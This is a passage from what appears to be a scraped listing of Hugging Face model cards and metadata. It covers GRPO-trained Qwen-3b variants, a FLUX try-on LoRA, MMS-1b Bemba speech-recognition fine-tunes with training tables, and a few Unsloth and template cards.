| 0.3390 | 5 | 0.163 | - |
| 0.6780 | 10 | 0.0257 | - |
| 1.0 | 15 | 0.0048 | 0.0057 |
| 1.3390 | 20 | 0.0031 | - |
| 1.6780 | 25 | 0.0021 | - |
| 2.0 | 30 | 0.0015 | 0.0027 |
| 2.3390 | 35 | 0.0021 | - |
| 2.6780 | 40 | 0.0023 | - |
| 3.0 | 45 | 0.001 | 0.0017 |
| 3.3390 | 50 | 0.0013 | - |
| 3.6780 | 55 | 0.0014 | - |
| 4.0 | 60 | 0.0013 | 0.0015 |
| 4.3390 | 65 | 0.0013 | - |
| 4.6780 | 70 | 0.001 | - |
| **5.0** | **75** | **0.0018** | **0.0015** |
* The bold row denotes the saved checkpoint.
### Framework Versions
- Python: 3.12.8
- Sentence Transformers: 5.1.0
- Transformers: 4.55.0
- PyTorch: 2.8.0+cu128
- Accelerate: 1.10.0
- Datasets: 4.0.0
- Tokenizers: 0.21.4
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
#### MultipleNegativesRankingLoss
```bibtex
@misc{henderson2017efficient,
title={Efficient Natural Language Response Suggestion for Smart Reply},
author={Matthew Henderson and Rami Al-Rfou and Brian Strope and Yun-hsuan Sung and Laszlo Lukacs and Ruiqi Guo and Sanjiv Kumar and Balint Miklos and Ray Kurzweil},
year={2017},
eprint={1705.00652},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
-->
|
alesiaivanova/Qwen-3b-GRPO-dag-5-sub-v5
|
alesiaivanova
| 2025-09-23T15:10:36Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"grpo",
"trl",
"arxiv:2402.03300",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:09:09Z |
---
library_name: transformers
model_name: Qwen-3b-GRPO-dag-5-sub-v5
tags:
- generated_from_trainer
- grpo
- trl
licence: license
---
# Model Card for Qwen-3b-GRPO-dag-5-sub-v5
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/alesyaivanova/long-horizon-reasoning/runs/bp0vfpld)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.3
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
Nohobby/SDXL_merges
|
Nohobby
| 2025-09-23T15:09:22Z | 0 | 0 | null |
[
"region:us"
] | null | 2025-05-16T16:08:13Z |
https://civitai.com/models/1665706?modelVersionId=1885360
|
alesiaivanova/Qwen-3b-GRPO-dag-5-sub-v4
|
alesiaivanova
| 2025-09-23T15:09:06Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"grpo",
"trl",
"arxiv:2402.03300",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:07:40Z |
---
library_name: transformers
model_name: Qwen-3b-GRPO-dag-5-sub-v4
tags:
- generated_from_trainer
- grpo
- trl
licence: license
---
# Model Card for Qwen-3b-GRPO-dag-5-sub-v4
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/alesyaivanova/long-horizon-reasoning/runs/q7737w4e)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.3
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
amitkp621/AR-3-lora
|
amitkp621
| 2025-09-23T15:08:46Z | 0 | 0 |
diffusers
|
[
"diffusers",
"image-to-image",
"flux",
"lora",
"template:sd-lora",
"ai-toolkit",
"base_model:black-forest-labs/FLUX.1-Kontext-dev",
"base_model:adapter:black-forest-labs/FLUX.1-Kontext-dev",
"license:creativeml-openrail-m",
"region:us"
] |
image-to-image
| 2025-09-23T15:08:40Z |
---
tags:
- image-to-image
- flux
- lora
- diffusers
- template:sd-lora
- ai-toolkit
base_model: black-forest-labs/FLUX.1-Kontext-dev
license: creativeml-openrail-m
inference:
parameters:
width: 768
height: 1024
instance_prompt: tryon
---
# AR-3-lora
Model trained with [AI Toolkit by Ostris](https://github.com/ostris/ai-toolkit)
## Trigger words
You should use `tryon` to trigger the image generation.
## Download model and use it with ComfyUI, AUTOMATIC1111, SD.Next, Invoke AI, etc.
Weights for this model are available in Safetensors format.
[Download](amitkp621/AR-3-lora/tree/main) them in the Files & versions tab.
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-Kontext-dev', torch_dtype=torch.bfloat16).to('cuda')
pipeline.load_lora_weights('amitkp621/AR-3-lora', weight_name='AR-3_000000250.safetensors')
image = pipeline('tryon').images[0]
image.save("my_image.png")
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
|
Youseff1987/qwen-3-4b-instruct-2507-translate-2509-lora
|
Youseff1987
| 2025-09-23T15:08:18Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"qwen3",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:08:04Z |
---
base_model: unsloth/qwen3-4b-instruct-2507-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** Youseff1987
- **License:** apache-2.0
- **Finetuned from model :** unsloth/qwen3-4b-instruct-2507-bnb-4bit
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
csikasote/mms-1b-all-bemgen-combined-m25f100-52-DAT-0.9
|
csikasote
| 2025-09-23T15:08:01Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"bemgen",
"mms",
"generated_from_trainer",
"base_model:facebook/mms-1b-all",
"base_model:finetune:facebook/mms-1b-all",
"license:cc-by-nc-4.0",
"endpoints_compatible",
"region:us"
] |
automatic-speech-recognition
| 2025-09-23T14:10:40Z |
---
library_name: transformers
license: cc-by-nc-4.0
base_model: facebook/mms-1b-all
tags:
- automatic-speech-recognition
- bemgen
- mms
- generated_from_trainer
model-index:
- name: mms-1b-all-bemgen-combined-m25f100-52-DAT-0.9
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# mms-1b-all-bemgen-combined-m25f100-52-DAT-0.9
This model is a fine-tuned version of [facebook/mms-1b-all](https://huggingface.co/facebook/mms-1b-all) on the BEMGEN - BEM dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2762
- Cer: 0.0799
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0003
- train_batch_size: 8
- eval_batch_size: 4
- seed: 52
- gradient_accumulation_steps: 2
- total_train_batch_size: 16
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 100
- num_epochs: 30.0
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Cer |
|:-------------:|:-------:|:----:|:---------------:|:------:|
| 7.5096 | 0.6711 | 100 | 2.8165 | 0.9938 |
| 2.4125 | 1.3423 | 200 | 0.4848 | 0.1492 |
| 1.4033 | 2.0134 | 300 | 0.3584 | 0.1053 |
| 1.2952 | 2.6846 | 400 | 0.3348 | 0.0977 |
| 1.2179 | 3.3557 | 500 | 0.3055 | 0.0878 |
| 1.1866 | 4.0268 | 600 | 0.2916 | 0.0830 |
| 1.1662 | 4.6980 | 700 | 0.2906 | 0.0856 |
| 1.1626 | 5.3691 | 800 | 0.2853 | 0.0818 |
| 1.2508 | 6.0403 | 900 | 0.2824 | 0.0805 |
| 1.2534 | 6.7114 | 1000 | 0.2814 | 0.0801 |
| 1.2901 | 7.3826 | 1100 | 0.2807 | 0.0798 |
| 1.2177 | 8.0537 | 1200 | 0.2762 | 0.0800 |
| 1.13 | 8.7248 | 1300 | 0.2736 | 0.0788 |
| 1.2379 | 9.3960 | 1400 | 0.2718 | 0.0777 |
| 1.0842 | 10.0671 | 1500 | 0.2699 | 0.0765 |
| 1.1996 | 10.7383 | 1600 | 0.2703 | 0.0759 |
| 1.17 | 11.4094 | 1700 | 0.2676 | 0.0746 |
| 1.1867 | 12.0805 | 1800 | 0.2664 | 0.0747 |
| 1.1887 | 12.7517 | 1900 | 0.2692 | 0.0768 |
| 1.1212 | 13.4228 | 2000 | 0.2664 | 0.0755 |
| 1.0755 | 14.0940 | 2100 | 0.2696 | 0.0755 |
### Framework versions
- Transformers 4.53.0.dev0
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.0
|
tomal66/qwen2.5-1.5b-sarcasm-fpt-sft
|
tomal66
| 2025-09-23T15:07:50Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:07:39Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
alesiaivanova/Qwen-3b-GRPO-dag-5-sub-v3
|
alesiaivanova
| 2025-09-23T15:07:38Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"grpo",
"arxiv:2402.03300",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:06:14Z |
---
library_name: transformers
model_name: Qwen-3b-GRPO-dag-5-sub-v3
tags:
- generated_from_trainer
- trl
- grpo
licence: license
---
# Model Card for Qwen-3b-GRPO-dag-5-sub-v3
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/alesyaivanova/long-horizon-reasoning/runs/pybdpuf3)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.3
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
csikasote/mms-1b-all-bemgen-combined-m25f100-52-DAT-0.8
|
csikasote
| 2025-09-23T15:06:49Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"bemgen",
"mms",
"generated_from_trainer",
"base_model:facebook/mms-1b-all",
"base_model:finetune:facebook/mms-1b-all",
"license:cc-by-nc-4.0",
"endpoints_compatible",
"region:us"
] |
automatic-speech-recognition
| 2025-09-23T14:04:49Z |
---
library_name: transformers
license: cc-by-nc-4.0
base_model: facebook/mms-1b-all
tags:
- automatic-speech-recognition
- bemgen
- mms
- generated_from_trainer
model-index:
- name: mms-1b-all-bemgen-combined-m25f100-52-DAT-0.8
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# mms-1b-all-bemgen-combined-m25f100-52-DAT-0.8
This model is a fine-tuned version of [facebook/mms-1b-all](https://huggingface.co/facebook/mms-1b-all) on the BEMGEN - BEM dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2647
- Cer: 0.0749
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0003
- train_batch_size: 8
- eval_batch_size: 4
- seed: 52
- gradient_accumulation_steps: 2
- total_train_batch_size: 16
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 100
- num_epochs: 30.0
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Cer |
|:-------------:|:-------:|:----:|:---------------:|:------:|
| 7.4713 | 0.6711 | 100 | 2.8159 | 0.9936 |
| 2.3838 | 1.3423 | 200 | 0.4800 | 0.1481 |
| 1.3854 | 2.0134 | 300 | 0.3520 | 0.1025 |
| 1.2711 | 2.6846 | 400 | 0.3291 | 0.0958 |
| 1.2033 | 3.3557 | 500 | 0.3053 | 0.0880 |
| 1.1614 | 4.0268 | 600 | 0.2895 | 0.0823 |
| 1.1279 | 4.6980 | 700 | 0.2898 | 0.0849 |
| 1.1116 | 5.3691 | 800 | 0.2781 | 0.0793 |
| 1.1895 | 6.0403 | 900 | 0.2771 | 0.0789 |
| 1.2331 | 6.7114 | 1000 | 0.2709 | 0.0761 |
| 1.2487 | 7.3826 | 1100 | 0.2706 | 0.0762 |
| 1.1348 | 8.0537 | 1200 | 0.2673 | 0.0765 |
| 1.092 | 8.7248 | 1300 | 0.2676 | 0.0760 |
| 1.2101 | 9.3960 | 1400 | 0.2669 | 0.0755 |
| 1.0461 | 10.0671 | 1500 | 0.2682 | 0.0761 |
| 1.1471 | 10.7383 | 1600 | 0.2686 | 0.0749 |
| 1.1155 | 11.4094 | 1700 | 0.2662 | 0.0743 |
| 1.1397 | 12.0805 | 1800 | 0.2681 | 0.0755 |
| 1.1501 | 12.7517 | 1900 | 0.2655 | 0.0749 |
| 1.0764 | 13.4228 | 2000 | 0.2646 | 0.0749 |
| 1.0326 | 14.0940 | 2100 | 0.2671 | 0.0746 |
| 1.0463 | 14.7651 | 2200 | 0.2679 | 0.0750 |
| 1.0518 | 15.4362 | 2300 | 0.2666 | 0.0742 |
### Framework versions
- Transformers 4.53.0.dev0
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.0
|
dsaedi/ESGF-Llama-3.1-8B-Instruct-V0.26
|
dsaedi
| 2025-09-23T15:06:36Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"llama",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:06:25Z |
---
base_model: unsloth/meta-llama-3.1-8b-instruct-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** dsaedi
- **License:** apache-2.0
- **Finetuned from model :** unsloth/meta-llama-3.1-8b-instruct-unsloth-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
alesiaivanova/Qwen-3b-GRPO-dag-5-sub-v2
|
alesiaivanova
| 2025-09-23T15:06:12Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"grpo",
"trl",
"arxiv:2402.03300",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:04:47Z |
---
library_name: transformers
model_name: Qwen-3b-GRPO-dag-5-sub-v2
tags:
- generated_from_trainer
- grpo
- trl
licence: license
---
# Model Card for Qwen-3b-GRPO-dag-5-sub-v2
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/alesyaivanova/long-horizon-reasoning/runs/v0y3bkqh)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.3
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
alesiaivanova/Qwen-3b-GRPO-dag-4-sub-v5
|
alesiaivanova
| 2025-09-23T15:04:45Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"grpo",
"trl",
"arxiv:2402.03300",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:03:21Z |
---
library_name: transformers
model_name: Qwen-3b-GRPO-dag-4-sub-v5
tags:
- generated_from_trainer
- grpo
- trl
licence: license
---
# Model Card for Qwen-3b-GRPO-dag-4-sub-v5
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/alesyaivanova/long-horizon-reasoning/runs/hhkrxv0p)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.3
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
alesiaivanova/Qwen-3b-GRPO-dag-4-sub-v4
|
alesiaivanova
| 2025-09-23T15:03:19Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"grpo",
"arxiv:2402.03300",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:01:56Z |
---
library_name: transformers
model_name: Qwen-3b-GRPO-dag-4-sub-v4
tags:
- generated_from_trainer
- trl
- grpo
licence: license
---
# Model Card for Qwen-3b-GRPO-dag-4-sub-v4
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/alesyaivanova/long-horizon-reasoning/runs/jkgv56zg)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.3
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
alesiaivanova/Qwen-3b-GRPO-dag-4-sub-v3
|
alesiaivanova
| 2025-09-23T15:01:54Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"grpo",
"arxiv:2402.03300",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:00:31Z |
---
library_name: transformers
model_name: Qwen-3b-GRPO-dag-4-sub-v3
